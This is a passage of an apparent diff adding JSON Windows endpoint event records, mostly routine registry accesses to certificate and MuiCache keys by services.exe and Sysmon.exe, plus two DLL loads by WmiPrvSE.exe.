"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "browcli.dll", + "image_path": "C:\\Windows\\System32\\browcli.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "FWPUCLNT.DLL", + "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": 